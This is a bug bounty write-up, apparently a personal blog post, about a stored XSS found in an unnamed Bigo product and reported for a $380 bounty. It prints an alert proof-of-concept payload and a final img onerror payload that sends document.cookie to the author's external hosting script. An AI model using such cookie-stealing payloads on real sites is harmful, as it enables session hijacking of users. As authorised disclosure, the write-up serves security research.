($380) XSS STORED in Bigo Bug Bounty Program

Assalamualaikum Bug Hunter and Hallo Everyone.

How are you?
I hope you are all well.

This time I will share about writing up bug findings in the Bigo Bug Bounty Program.

This discovery began after I managed to find a vulnerability from the Bigo Bug Bounty program. At that time I thought that the same vulnerability I found earlier was either no longer there or had been completely fixed by Bigo SRC. When I have free time, I try to find it again and check it again. And I got a similar vulnerability before. Come follow me :D

The vulnerability I found was in the form of XSS STORED. Sorry if I didn’t mention which app these findings are in. Because Bigo SRC did not give me permission to name the product I found the vulnerability.

And this started when I found a feature POST data from the application to the website.

Then I tried to POST the data from the application by entering the payload:
“><img src=x onerror=alert(document.domain)>

When I see the POST data result on the product’s official website, and the payload is executed :D

I was surprised to see that. Then a pop up appears.

Maybe I think this is enough to report to them. When I’ve sent a report to them, and they responded.

Something interesting here, where they asked me to take cookies.

Then I tried to fetch cookies from XSS HUNTER payload.

And see, it doesn’t work, the POST input only allows 120 words.

I’m confused, how to get a cookie with a payload of 120 words?

At that time I immediately looked for references from articles on google and I got the solution, namely with XSS Cookie Stealling.

Here’s the reference :

Next I created a php and txt file on my hosting.

Final payload :

“><img src=x onerror=this.src=’https://herroid1337.000webhostapp.com/m.php?cok='+document.cookie>

And the cookie has been captured.

Then I reported this to them, and finally my report was received with a HIGH severity status.

Timeline :

Report : 12/07/2021

Valid : 13/07/2021

Severity : HIGH

Bounty : $380